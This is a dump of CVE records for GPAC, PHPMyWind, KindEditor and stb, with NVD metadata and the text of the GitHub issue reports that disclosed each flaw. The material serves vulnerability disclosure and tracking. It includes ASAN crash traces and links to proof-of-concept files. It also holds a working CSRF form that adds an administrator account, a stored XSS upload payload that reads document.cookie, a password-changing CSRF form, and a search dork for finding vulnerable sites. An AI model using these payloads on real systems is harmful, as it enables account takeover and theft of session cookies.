"criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/gpac/gpac/issues/1339 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [ √] I looked for a similar issue and couldn't find any.
- [ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
A crafted input will lead to crash in av_parsers.c at gpac 0.8.0.
Triggered by
./MP4Box -diso POC -out /dev/null
Poc
[001gf_media_nalu_remove_emulation_bytes](https://github.com/gutiniao/afltest/blob/master/001gf_media_nalu_remove_emulation_bytes)
The ASAN information is as follows:
```
./MP4Box -diso 001gf_media_nalu_remove_emulation_bytes -out /dev/null
[iso file] Media header timescale is 0 - defaulting to 90000
=================================================================
==23148==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000002d1 at pc 0x5632845c98b0 bp 0x7ffdce21c4e0 sp 0x7ffdce21c4d0
READ of size 1 at 0x6020000002d1 thread T0
#0 0x5632845c98af in gf_media_nalu_remove_emulation_bytes media_tools/av_parsers.c:4722
#1 0x5632845c991b in gf_media_avc_read_sps media_tools/av_parsers.c:4737
#2 0x5632843ea9a9 in avcc_Read isomedia/avc_ext.c:2371
#3 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528
#4 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208
#5 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419
#6 0x5632848afbf1 in video_sample_entry_Read isomedia/box_code_base.c:4405
#7 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528
#8 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208
#9 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419
#10 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528
#11 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208
#12 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419
#13 0x5632848b38a4 in stbl_Read isomedia/box_code_base.c:5381
#14 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528
#15 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208
#16 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419
#17 0x5632848ad40b in minf_Read isomedia/box_code_base.c:3500
#18 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528
#19 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208
#20 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419
#21 0x5632848ab73f in mdia_Read isomedia/box_code_base.c:3021
#22 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528
#23 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208
#24 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419
#25 0x5632848ba906 in trak_Read isomedia/box_code_base.c:7129
#26 0x5632844183d4 in gf_isom_box_read isomedia/box_funcs.c:1528
#27 0x5632844183d4 in gf_isom_box_parse_ex isomedia/box_funcs.c:208
#28 0x563284418e10 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419
#29 0x5632848adf64 in moov_Read isomedia/box_code_base.c:3745
#30 0x563284419b35 in gf_isom_box_read isomedia/box_funcs.c:1528
#31 0x563284419b35 in gf_isom_box_parse_ex isomedia/box_funcs.c:208
#32 0x56328441a1e4 in gf_isom_parse_root_box isomedia/box_funcs.c:42
#33 0x563284430f44 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206
#34 0x563284433bca in gf_isom_open_file isomedia/isom_intern.c:615
#35 0x56328417c852 in mp4boxMain /home/liuz/gpac-master/applications/mp4box/main.c:4767
#36 0x7f0252bccb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#37 0x56328416db19 in _start (/usr/local/gpac-asan3/bin/MP4Box+0x163b19)
0x6020000002d1 is located 0 bytes to the right of 1-byte region [0x6020000002d0,0x6020000002d1)
allocated by thread T0 here:
#0 0x7f0253855b50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
#1 0x5632843ea263 in avcc_Read isomedia/avc_ext.c:2343
SUMMARY: AddressSanitizer: heap-buffer-overflow media_tools/av_parsers.c:4722 in gf_media_nalu_remove_emulation_bytes
Shadow bytes around the buggy address:
0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff8010: fa fa fd fd fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff8020: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff8030: fa fa 00 00 fa fa 00 00 fa fa 00 05 fa fa 00 00
0x0c047fff8040: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
=>0x0c047fff8050: fa fa 00 00 fa fa 00 00 fa fa[01]fa fa fa 01 fa
0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==23148==ABORTING
```
| There is a heap-buffer-overflow in the gf_media_nalu_remove_emulation_bytes function of av_parsers.c:4722 | https://api.github.com/repos/gpac/gpac/issues/1339/comments | 1 | 2019-11-13T03:14:38Z | 2020-01-09T17:59:39Z | https://github.com/gpac/gpac/issues/1339 | 521,931,348 | 1,339 | 2,698 |
CVE-2020-22679 | 2021-10-12T21:15:07.580 | Memory leak in the sgpd_parse_entry function in MP4Box in gpac 0.8.0 allows attackers to cause a denial of service (DoS) via a crafted input. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1345"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1345"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/gpac/gpac/issues/1345 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
[ √] I looked for a similar issue and couldn't find any.
[ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
[ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
A crafted input will lead to crash in box_code_base.c at gpac 0.8.0.
Triggered by
./MP4Box -diso POC -out /dev/null
Poc
[007-memleak-sgpd_parse_entry](https://github.com/gutiniao/afltest/blob/master/007-memleak-sgpd_parse_entry)
The ASAN information is as follows:
```
./MP4Box -diso 007-memleak-sgpd_parse_entry -out /dev/null
[iso file] Unknown box type gods in parent moov
[iso file] Box "avcC" (start 939) has 34 extra bytes
[iso file] Unknown box type 0000 in parent sinf
[iso file] Invalid descriptor tag 0xc1 in esds
[iso file] Read Box "esds" (start 1491) failed (Invalid IsoMedia File) - skipping
[iso file] Invalid descriptor tag 0xc1 in esds
[iso file] Read Box "esds" (start 0) failed (Invalid IsoMedia File) - skipping
[isom] not enough bytes in box sgpd: 20 left, reading 63 (file isomedia/box_code_base.c, line 9926)
[iso file] Read Box "sgpd" (start 1678) failed (Invalid IsoMedia File) - skipping
[iso file] Read Box "stbl" (start 1431) failed (Invalid IsoMedia File) - skipping
[iso file] Read Box "minf" (start 1371) failed (Invalid IsoMedia File) - skipping
[iso file] Read Box "mdia" (start 1298) failed (Invalid IsoMedia File) - skipping
[iso file] Read Box "trak" (start 1198) failed (Invalid IsoMedia File) - skipping
[iso file] Read Box "moov" (start 351) failed (Invalid IsoMedia File) - skipping
Error opening file 007-memleak-sgpd_parse_entry: Invalid IsoMedia File
=================================================================
==6751==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 37 byte(s) in 1 object(s) allocated from:
#0 0x7f25e0370b50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
#1 0x55e8ff099553 in sgpd_parse_entry isomedia/box_code_base.c:9656
#2 0x55e8ff099553 in sgpd_Read isomedia/box_code_base.c:9922
SUMMARY: AddressSanitizer: 37 byte(s) leaked in 1 allocation(s)
```
| There are memory leaks in the sgpd_parse_entry function of box_code_base.c:9656 | https://api.github.com/repos/gpac/gpac/issues/1345/comments | 1 | 2019-11-13T05:25:14Z | 2020-01-09T18:00:00Z | https://github.com/gpac/gpac/issues/1345 | 521,967,985 | 1,345 | 2,699 |
CVE-2020-19964 | 2021-10-14T15:15:08.767 | A Cross Site Request Forgery (CSRF) vulnerability was discovered in PHPMyWind 5.6 which allows attackers to create a new administrator account without authentication. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://phpmywind.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://github.com/gaozhifeng/PHPMyWind"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gaozhifeng/PHPMyWind/issues/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://phpmywind.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://github.com/gaozhifeng/PHPMyWind"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gaozhifeng/PHPMyWind/issues/9"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:phpmywind:phpmywind:5.6:*:*:*:*:*:*:*",
"matchCriteriaId": "7B3A030C-77BA-4095-9EFC-7B1109E570CB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/gaozhifeng/PHPMyWind/issues/9 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"gaozhifeng",
"PHPMyWind"
] |
Product Homepage: http://phpmywind.com/
Software link: https://github.com/gaozhifeng/PHPMyWind
Version: v5.6
The backend code writes the new user data to the database without authentication such as token
```php
if($dosql->GetOne("SELECT `id` FROM `$tbname` WHERE `username`='$username'"))
{
ShowMsg('用户名已存在!', '-1');
exit();
}
$password = md5(md5($password));
$loginip = '127.0.0.1';
$logintime = time();
$sql = "INSERT INTO `$tbname` (username, password, nickname, question, answer, levelname, checkadmin, loginip, logintime) VALUES ('$username', '$password', '$nickname', '$question', '$answer', '$levelname', '$checkadmin', '$loginip', '$logintime')";
if($dosql->ExecNoneQuery($sql))
{
header("location:$gourl");
exit();
}
```
When the background administrator clicks the malicious link, the background will add an administrator user
PoC:
```html
<html>
<body>
<form action="http://127.0.0.1:9000/admin/admin_save.php" method="POST">
<html>
<form action="http://127.0.0.1:9000/admin/admin_save.php" method="POST">
<input type="hidden" name="username" value="admincsrf" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="repassword" value="admin" />
<input type="hidden" name="question" value="0" />
<input type="hidden" name="answer" value="" />
<input type="hidden" name="nickname" value="" />
<input type="hidden" name="levelname" value="1" />
<input type="hidden" name="checkadmin" value="true" />
<input type="hidden" name="action" value="add" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
 | CSRF vulnerability exists in PHPMyWind v5.6 | https://api.github.com/repos/gaozhifeng/PHPMyWind/issues/9/comments | 0 | 2019-10-28T06:19:09Z | 2019-10-28T06:19:09Z | https://github.com/gaozhifeng/PHPMyWind/issues/9 | 513,117,647 | 9 | 2,700 |
CVE-2021-42227 | 2021-10-14T17:15:08.787 | Cross SIte Scripting (XSS) vulnerability exists in KindEditor 4.1.x via a Google search inurl:/examples/uploadbutton.html and then the .html file on the website that uses this editor (the file suffix is allowed). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kindsoft/kindeditor/issues/336"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kindsoft/kindeditor/issues/336"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kindsoft:kindeditor:*:*:*:*:*:*:*:*",
"matchCriteriaId": "144DBADD-4B45-42B6-AFD7-435C62A9BC18",
"versionEndExcluding": null,
"versionEndIncluding": "4.1.12",
"versionStartExcluding": null,
"versionStartIncluding": "4.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/kindsoft/kindeditor/issues/336 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kindsoft",
"kindeditor"
] |
> [Suggested description]
> Cross SIte Scripting (XSS) vulnerability exists in KindEditor 4.1.x via
> a Google search inurl:/examples/uploadbutton.html and then the .html
> file on the website that uses this editor (the file suffix is allowed).
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> https://github.com/kindsoft/kindeditor
>
> ------------------------------------------
>
> [Affected Product Code Base]
> kindeditor - 4.1.*
>
> ------------------------------------------
>
> [Affected Component]
> POST /Public/JS/kindeditor-4.1.10/php/upload_json.php?dir=file HTTP/1.1
> Content-Disposition: form-data; name="imgFile"; filename="iframe.html"
> Content-Type: text/html
>
> <script>alert(document.cookie)</script>
> -----------------------------293582696
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> You just need to search in google: inurl:/examples/uploadbutton.html,
> Then upload the .html file on the website that uses this editor (the file suffix is allowed) | There is a stored xss vulnerability in kindeditor - 4.1.* | https://api.github.com/repos/kindsoft/kindeditor/issues/336/comments | 0 | 2021-10-14T06:26:59Z | 2021-10-14T06:26:59Z | https://github.com/kindsoft/kindeditor/issues/336 | 1,026,009,823 | 336 | 2,701 |
CVE-2021-42228 | 2021-10-14T17:15:08.830 | A Cross Site Request Forgery (CSRF) vulnerability exists in KindEditor 4.1.x, as demonstrated by examples/uploadbutton.html. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kindsoft/kindeditor/issues/337"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kindsoft/kindeditor/issues/337"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kindsoft:kindeditor:*:*:*:*:*:*:*:*",
"matchCriteriaId": "144DBADD-4B45-42B6-AFD7-435C62A9BC18",
"versionEndExcluding": null,
"versionEndIncluding": "4.1.12",
"versionStartExcluding": null,
"versionStartIncluding": "4.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/kindsoft/kindeditor/issues/337 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kindsoft",
"kindeditor"
] | > [Suggested description]
> Cross Site Request Forgery (CSRF) vulnerability exists in KindEdirot
> 4.1.x. First, you upload an html file containing csrf on the website
> that uses a google editor, (you only need to search in google:
> inurl:/examples/uploadbutton.html) and then use the authority of this
> website to trick users into clicking your malicious html link.
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Request Forgery (CSRF)
>
> ------------------------------------------
>
> [Vendor of Product]
> https://github.com/kindsoft/kindeditor
>
> ------------------------------------------
>
> [Affected Product Code Base]
> kindeditor - 4.1.*
>
> ------------------------------------------
>
> [Affected Component]
> To find a website that uses this editor, you only need to search in google: inurl:/examples/uploadbutton.html
> Because this is the feature file of this editor
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> Attackers can use websites trusted by users to perform dangerous operations
>
> ------------------------------------------
>
> [Attack Vectors]
> <html>
> <head>
> <title>csrf test</title>
> </head>
> <body>
> <form action="http://127.0.0.1:2003/dvwa1.9/vulnerabilities/csrf/"> // your target url
> <input type="hidden" name="password_new" value="12345678" />
> <input type="hidden" name="password_conf" value="12345678" />
> <input type="hidden" name="Change" value"Change" />
> <input type="submit" value"let's click it!" />
> </form>
> </body>
> </html>
> | There is a csrf vulnerability in kindeditor - 4.1.* | https://api.github.com/repos/kindsoft/kindeditor/issues/337/comments | 0 | 2021-10-14T06:34:58Z | 2021-10-14T06:34:58Z | https://github.com/kindsoft/kindeditor/issues/337 | 1,026,015,699 | 337 | 2,702 |
CVE-2021-28021 | 2021-10-15T16:15:07.340 | Buffer overflow vulnerability in function stbi__extend_receive in stb_image.h in stb 2.26 via a crafted JPEG file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1108"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00045.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1108"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00045.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stb_project:stb:2.26:*:*:*:*:*:*:*",
"matchCriteriaId": "FF2E3EE0-725E-48D0-A6A0-F82409594F61",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
